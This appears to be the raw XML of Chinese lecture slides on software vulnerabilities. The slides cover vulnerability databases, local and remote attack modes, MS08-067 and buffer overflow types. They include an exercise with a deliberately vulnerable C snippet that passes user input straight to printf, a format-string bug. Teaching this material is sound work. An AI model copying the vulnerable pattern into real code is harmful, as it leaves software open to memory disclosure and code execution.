        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下面代码中存在漏洞，请分析漏洞类型成因和利用方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>argc,char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> ** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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国内漏洞库</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184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CNVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>国家信息安全漏洞共享平台是由国家计算机网络应急技术处理协调中心（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CNCERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）联合国内重要信息系统单位建立的信息安全漏洞信息共享知识库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>建立软件漏洞统一收集验证、预警发布及应急处置体系</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CNNVD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中国国家信息安全漏洞库，漏洞编号规则为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CNNVD-xxxxxx-xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。是中国信息安全测评中心负责建设运维的国家信息安全漏洞库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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软件漏洞利用方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204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本地攻击模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程主动攻击模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程被动攻击模式</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本地攻击模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215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攻击者：系统本地的合法用户或已经通过其他攻击方法获得了本地权限的非法用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>特点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>“辅助”性质的漏洞，利用以获得更高的权限</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内核提权漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>让一个应用程序直接从用户态穿透到内核态</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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远程主动攻击模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225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特点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>若目标主机上的某个网络程序存在漏洞，则攻击者可能通过利用该漏洞获得目标主机的访问或控制权</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>章 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>软件漏洞及风险分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51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5124" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="2484438"/>
            <a:ext cx="48387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1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>软件漏洞概述</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5" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="3068638"/>
            <a:ext cx="4838700" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>缓冲区溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5126" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="3659188"/>
            <a:ext cx="48387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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>3 XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5127" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="4248150"/>
            <a:ext cx="48387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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>脚本漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:sym typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5128" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="4832350"/>
            <a:ext cx="48387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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>注入漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:sym typeface="Arial"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en-US" dirty="0"/>
              <a:t>例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MS08-067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞：如果用户在受影响的系统上收到特制的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>RPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>请求，则该漏洞可能允许远程执行代码，导致用户系统被完全入侵，且能够以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>权限执行任意指令并获取数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>影响范围：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows2000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Server 2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Vista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Server2008</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>7 Beta</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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远程被动攻击模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256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模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当一个用户访问网络上的一台恶意主机，就可能遭到目标主机发动的针对性恶意攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网页挂马</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>结合浏览器或浏览组件的相关漏洞来触发第三方恶意程序下载执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文档捆绑型漏洞攻击：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系列特制文档攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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缓冲区溢出漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2662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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="2484438"/>
            <a:ext cx="48387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1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>栈溢出漏洞</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26629" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="3068638"/>
            <a:ext cx="4838700" cy="585787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00CCFF"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>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2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>堆溢出漏洞</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26630" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="3659188"/>
            <a:ext cx="48387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3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>整型溢出漏洞</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26631" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2757488" y="4248150"/>
            <a:ext cx="48387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4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>格式化字符串溢出漏洞</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缓冲区溢出漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>缓冲区</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>计算机程序一般都会使用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>到一些内存，这些内存或是程序内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>部使用，或是存放用户的输入数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>，这样的内存一般称作缓冲区。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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缓冲区溢出漏洞原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2765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形成原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>当程序在处理用户数据时，未能对其大小进行恰当的限制，或者在进行拷贝、填充时没对这些数据限定边界，导致实际操作的数据大小超过了内存中目标缓冲区的大小，使得内存中一些关键数据被覆盖，从而引发安全问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 10" descr="flour"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6156176" y="5433594"/>
            <a:ext cx="1319363" cy="1093036"/>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的内存布局</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
